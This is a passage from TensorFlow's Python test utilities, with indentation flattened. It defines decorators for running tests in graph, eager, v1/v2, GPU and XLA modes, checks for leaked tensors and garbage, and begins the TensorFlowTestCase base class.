@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
"""
def decorator(self, **kwargs):
"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various versions
# of python2.7.x.
for _ in range(2):
f(self, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
# In some cases (specifacally on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert new_count <= previous_count, (
"new_count(%d) is not less than or equal to previous_count(%d)" %
(new_count, previous_count))
gc.enable()
return decorator
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, blacklist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(blacklist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in blacklist:
if b is obj:
return "<test code>"
if obj is blacklist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, blacklist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
blacklist: same as blacklist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, blacklist):
return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, blacklist):
"""Builds a reference graph as <referrer> -> <list of refferents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
blacklist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
blacklist = blacklist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, blacklist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, blacklist)
reprs[r_id] = describe(r, blacklist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = _combine_named_parameters(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
combinations = [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
return combinations
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)), "".join(
filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) + [("testcase_name",
"_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith(
unittest.TestLoader.testMethodPrefix) and not (
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or name == "test_session"):
setattr(cls, name, base_decorator(value))
return cls
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
reset_test=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
reset_test: If True, tearDown and SetUp the test case between the two
executions of the test (once with and once without eager execution).
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
if reset_test:
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return decorated
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.get_default_graph()._building_function:
return f(*args, **kwds)
tensor_args, tensor_indices = zip(*[(x, i)
for i, x in enumerate(args)
if isinstance(x, (ops.Tensor,
variables.Variable))])
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if tf2.enabled():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only comptaible in v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the precense
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the precense
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(
local_device.physical_device_desc) >=
min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders we should be able to
call self.evaluate(), however this requires rewriting the test case.
This class shold be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evalaute `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
# signal completion
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
# The description is just for documentation purposes.
def disable_xla(description):
def disable_xla_impl(func):
"""Execute the test method only if xla is not enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_xla_impl
# The description is just for documentation purposes.
def disable_all_xla(description):
def disable_all_impl(cls):
"""Execute all test methods in this class only if xla is not enabled."""
base_decorator = disable_xla
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and not name == "test_session":
setattr(cls, name, base_decorator(value))
return cls
return disable_all_impl
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
os.putenv(
"TF_XLA_FLAGS", "--tf_xla_auto_jit=2 --tf_xla_min_cluster_size=1 "
"--tf_xla_enable_lazy_compilation=false")
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices, tensor.values,
tensor.dense_shape)
return tensor.numpy()
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
